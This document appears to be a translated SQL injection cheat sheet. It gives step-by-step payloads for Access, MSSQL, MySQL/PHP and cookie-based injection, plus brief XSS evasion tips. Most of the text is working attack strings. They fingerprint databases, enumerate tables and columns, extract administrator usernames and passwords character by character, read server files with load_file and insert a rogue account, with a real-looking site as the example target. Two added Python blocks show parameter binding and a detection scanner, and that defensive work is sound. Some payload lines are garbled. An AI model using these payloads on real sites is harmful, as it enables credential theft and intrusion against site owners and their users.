Step 1: first uncheck IE menu => Tools => Internet Options => Advanced => Show friendly HTTP error messages. Otherwise, whatever error the server returns, IE displays only an HTTP 500 server error and no further detail is available.
Numeric type: and 1=1 / and 1=2 (to determine whether injection exists)
Character type: ' and '1'='1 / ' and '1'='2
Search type: keyword%' and 1=1 and '%'='% / keyword%' and 1=2 and '%'='%
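An added example, not from the original page: the concatenated and parameter-bound forms of a lookup side by side, run against the numeric and character tests above to show that the true/false difference disappears once the value is bound. It uses Python's sqlite3 in place of Access/MSSQL, and the table, data and function names are assumptions made for the illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data standing in for the table behind a page like 1.asp?id=44.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)", [(44, "hello"), (45, "world")])
    return db

def by_id_concat(db, raw):
    # Weak: the request value is pasted into the SQL text.
    return db.execute("SELECT title FROM news WHERE id = " + raw).fetchall()

def by_id_bound(db, raw):
    # Hardened: reject anything that is not a plain integer, then bind it.
    if not re.fullmatch(r"[0-9]{1,9}", raw):
        return None  # the application would answer 400 here
    return db.execute("SELECT title FROM news WHERE id = ?", (int(raw),)).fetchall()

def by_title_concat(db, raw):
    # Weak: a quote in the value closes the string literal.
    return db.execute("SELECT id FROM news WHERE title = '" + raw + "'").fetchall()

def by_title_bound(db, raw):
    # Hardened: the whole value, quotes included, is compared as data.
    return db.execute("SELECT id FROM news WHERE title = ?", (raw,)).fetchall()

def probe_differs(lookup, db, value, true_probe, false_probe):
    # The signal the test relies on: the always-true variant matches the
    # original response and the always-false variant does not.
    baseline = lookup(db, value)
    return lookup(db, value + true_probe) == baseline != lookup(db, value + false_probe)

def run_checks():
    db = make_db()
    num = (" and 1=1", " and 1=2")
    txt = ("' and '1'='1", "' and '1'='2")
    return {
        "id_concat": probe_differs(by_id_concat, db, "44", *num),
        "id_bound": probe_differs(by_id_bound, db, "44", *num),
        "title_concat": probe_differs(by_title_concat, db, "hello", *txt),
        "title_bound": probe_differs(by_title_bound, db, "hello", *txt),
    }

if __name__ == "__main__":
    for name, signal in run_checks().items():
        print(name, "differential present" if signal else "no differential")
```

The same `probe_differs` check can be kept as a regression test for every request parameter that reaches a query.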
When IIS reports errors:
and user>0 (to tell whether ACCESS or MSSQL is in use)
If no error is reported, use the features specific to each database to decide:
and (select count(*) from msysobjects)>0 (an insufficient-permissions response indicates an Access database)
and (select count(*) from sysobjects)>0 (a normal response indicates an MSSQL database)
and db_name()>0 (returns the database name)
and 0<>(select @@version)-- (determines version information)
*********** Note: first locate the back-end (admin) address before guessing, or the effort is wasted ***********
ACCESS injection:
Guess the table name (a normal response means admin exists; an abnormal response means it does not)
and exists (select * from [admin])
and (select count(*) from Admin)>0
Guess the field (a normal response means the field username exists; an abnormal response means it does not)
and (select username from Admin)>0
and exists (select username from [admin])
Guess the username and password length
and (select top 1 len(username) from Admin)>0
and (select top 1 len(password) from Admin)>0
Principle: if the length of the username in the top 1 row is greater than 0, the condition is true. Continue with >1, >2, >3 and so on until the condition is no longer true. For example, if >4 is true and >5 is not, then len(username)=5, that is, the username is 5 characters long. Once the length is known, mid(username, N, 1) extracts the Nth character and asc(mid(username, N, 1)) gives its ASCII code.
Guess the user
And (select top 1 asc (mid (username,) from Admin)>, 2 ...,
An error is displayed when the input reaches 109, while everything up to 108 is correct, so the ASCII code of the first character is 109 and the first character is m.
Similarly, and (select top 1 asc (mid (username,) from Admin)>, 2...
It is not true when it reaches 114, indicating that the second character's ASCII code value is 114, and the character is r.
Note that the ASCII code between English and numbers is 1...
MSSQL injection:
having 1=1-- [the error message reveals a table name and field, for example: the column 'users.id' is invalid in the select list]
group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
; insert into users values (666, attacker, foobar, 0xffff)-- [insert a new record]
Guess the table name:
Every database in SQL Server has user tables and system tables. The system table sysobjects holds a row for each object created in the database (constraints, default values, logs, rules, stored procedures, etc.), so the table names of the current database are stored in it. Three columns are commonly used: name (table name), xtype (object type; U is a user table), and id (object ID).
and (select top 1 name from sysobjects where xtype='U')>0 (obtains the first table name, such as user)
and (select top 1 name from sysobjects where xtype='U' and name not in ('user'))>0 (obtains the second table name, and so on)
Guess the column name:
Two built-in functions are used: col_name() and object_id(). The format of col_name() is "COL_NAME(table_id, column_id)", where table_id is the table ID and column_id is the column ID. object_id('admin') is the ID of admin in sysobjects, and column_id = 1, 2, 3 refers to columns 1, 2 and 3 of admin.
and (select top 1 col_name(object_id('admin'), 1) from sysobjects)>0 [obtains the first column name of the admin table, "username"; continue in the same way to obtain "password", "id", and so on]
Guess the content of the field:
and (select top 1 username from [admin])>0 [returns the user name directly]
and (select top 1 password from [admin])>0 [returns the password directly]
UNION Joint query:
select name, password, id from user union select user, pwd, uid from Table Name
and 1=1 union select 1, 2, 3, 4, 5... from Table Name (add values one at a time starting from 1; if the response is normal when 5 is reached, there are 5 fields)
ASCII character-by-character decoding:
1. Guess the length of the column
and (select top 1 len(column name) from Table Name)>N
where N is a number that is varied to guess the column length. If N = 6 is correct and N = 7 is incorrect, the length is 7.
To guess the second record, use: select top 1 len(column name) from table name where column name not in (select top 1 column name from table name)
2. Guess the user name and password
Use the asc() and mid() functions: asc(mid(column name, N, 1)) returns the ASCII code of the Nth character of "column name".
The decoding statement is: and (select top 1 asc(mid(field, 1, 1)) from database name)>ASCII code
Range test statement: ... between ... and ...
Chinese processing method: When the ASCII conversion is negative, use the abs () function to obtain the absolute value.
Example: and (select top 1 abs (asc (mid (field,) from database name) = ASC code
ASCII character-by-character decoding:
1. Guess the table name: and (select count(*) from admin)<>0
2. Guess the column name: and (select count(column name) from Table Name)<>0
3. Guess the number of users: and (select count(*) from Table Name)>1, >2, ...; if >2 is normal and >3 gives an error, the table has 3 records.
4. Guess the length of the username: and (select len(column name) from Table Name)>=1, >=2, >=3, >=4.
5. Guess the username: and (select count (*) from table name where (asc (mid (column name, 130) between 30 and) <> 0
Finally, submit: and (select asc(mid(column name, 1, 1)) from Table Name)=ASCII value
6. Guess the administrator's password:
Following the same principle, replace the column name in the statement above (asc (mid (column name,) with PASSWORD to obtain the password.
MySQL + PHP injection:
1. Determine whether injection exists by appending '; and 1=1; and 1=2
2. Determine the version and ord (mid (version (), 4.0)> 51/*. If the returned result is normal, the version is later than. You can use union to query
3. Use order by to brute-force the number of fields: append order by 10/* to the URL. If the returned result is normal, the number of fields is greater than 10.
4. Use union to find the exact number of fields, for example and 1=2 union select 1, 2, 3, .../* until the returned result is normal, which means the exact number of fields has been found. If spaces are filtered, use /**/ instead.
5. Determine whether the database connection account has write permission: and (select count(*) from mysql.user)>0/*. If an error is returned, the only option is to guess the administrator account and password.
6. If the returned result is normal, you can use and 1=2 union select 1, 2, 3, 4, 5, 6, load_file(char(ASCII values of the file path, separated by commas)), 8, 9, 10/*. Note: load_file(char(ASCII values of the file path, separated by commas)) can also be written in hexadecimal; this is used to read the configuration file and find the database connection details.
7. First guess the user table, for example and 1=2 union select 1, 2, 3, 4, 5, 6... from user/*. If the returned result is normal, the table exists.
8. Once the table is known, guess the field: and 1=2 union select 1, username, 3, 4, 5, 6... from user/*. If field content is displayed in position 2, the field exists.
9. Guess the password field in the same way.
Cookie injection:
Condition: ID = Request("ID"). (The web server first looks for the value in GET, then in POST, and then in Cookies.) If the cookie value is not filtered, cookie injection is possible.
****** When Request.QueryString or Request.Form is used to collect the data, injection through Cookies is not possible ******
Determine whether cookie injection exists
Example: http://www.xiaoweio.cn/1.asp?id=44
Entering http://www.xiaoweio.cn/1.asp displays abnormally because no parameter is supplied.
javascript:alert(document.cookie="id="+escape("44 and 1=1")); refresh the page; if it is displayed normally, continue testing (if it is not, the input may be filtered)
javascript:alert(document.cookie="id="+escape("44 and 1=2")); refresh the page; if it is not displayed properly, injection exists.
Guess length:
javascript:alert(document.cookie="id="+escape("44 and (select len(password) from admin)=16"))
Guess the content:
javascript:alert(document.cookie="id="+escape("44 and (select asc(mid(username)) from admin)=97"))
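An added detection example, not from the original page: a small scanner that flags the probe shapes listed on this page in both the query string and the Cookie header, after undoing URL encoding and the /**/ space substitution mentioned in the MySQL section. The rule set, function names and sample requests are constructed for the illustration.

```python
import re
from urllib.parse import unquote_plus

RULES = {  # hypothetical rule names, patterns taken from the probes on this page
    "boolean-probe": re.compile(r"\band \d+ ?= ?\d+"),
    "system-table": re.compile(r"\b(msysobjects|sysobjects|mysql\.user)\b"),
    "union-select": re.compile(r"\bunion select\b"),
    "file-read": re.compile(r"\bload_file ?\("),
    "char-extract": re.compile(r"\b(asc|ord) ?\( ?mid ?\("),
    "subselect": re.compile(r"\band ?\( ?select\b"),
}

def normalize(value):
    # Decode, lower-case, turn /**/ comments into spaces (the space-filter
    # workaround the page mentions), then collapse runs of whitespace.
    text = unquote_plus(value).lower()
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)

def scan(request):
    # request: dict with "query" and "cookie" strings. Both are inspected,
    # because Request("ID") falls through to cookies when GET/POST are empty.
    hits = []
    for source in ("query", "cookie"):
        text = normalize(request.get(source, ""))
        for name, rule in RULES.items():
            if rule.search(text):
                hits.append((source, name))
    return hits

SAMPLES = [  # constructed requests, not real traffic
    {"query": "id=44", "cookie": "ASPSESSIONID=ABCDEF"},
    {"query": "id=44%20and%201=1", "cookie": ""},
    {"query": "id=44/**/and/**/1=2/**/union/**/select/**/1,2,3", "cookie": ""},
    {"query": "", "cookie": "id=44%20and%20%28select%20len%28password%29%20from%20admin%29%3D16"},
]

def report(samples=SAMPLES):
    # One list of (source, rule) hits per request, in input order.
    return [scan(s) for s in samples]

if __name__ == "__main__":
    for sample, hits in zip(SAMPLES, report()):
        print(sample, "->", hits or "clean")
```

A filter or log rule that inspects only GET and POST values misses the fourth request, which is the case the cookie section describes.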
PHP injection:
Determine the injection point: '; and 1=1; and 1=2
Judge UNION: and ord (mid (version (), 4.0)> 51. If the returned result is correct, can be queried by UNION.
Use order by to brute-force the number of fields: order by n (n = 1, 2, 3 ...) (if 3 is correct and 4 is incorrect, there are 3 fields)
Use union to find the exact number of fields: and 1=1 union select 1, 2, 3, ... (when the returned result is normal, the number of fields equals the last number)
Check whether the database connection account has write permission: and (select count(*) from mysql.user)>0 (if an error is returned, the only option is to guess the administrator's account and password; if the returned result is normal, you can use
and 1=2 union select 1, 2, 3, 4, 5, 6, load_file(char(ASCII values of the file path, separated by commas)), 8, 9, 10 [Note: load_file(char(ASCII values of the file path, separated by commas)) can also be written in hexadecimal; the configuration file is read this way])
Guess the table: and 1=2 union select 1, 2, 3, 4, 5, 6... from user (the table exists if the returned result is normal)
Guess the field: and 1=2 union select 1, username, 3, 4, 5, 6... from user (substitute other names in the same way; if field content is displayed in position 2, the field exists)
The password field can be guessed in the same way.
Cross-site:
<script>alert("Cross-Site")</script> (most commonly used)
(? Spaces obtained by using the tab key)
(/**/Comments)
Html Entity
Unicode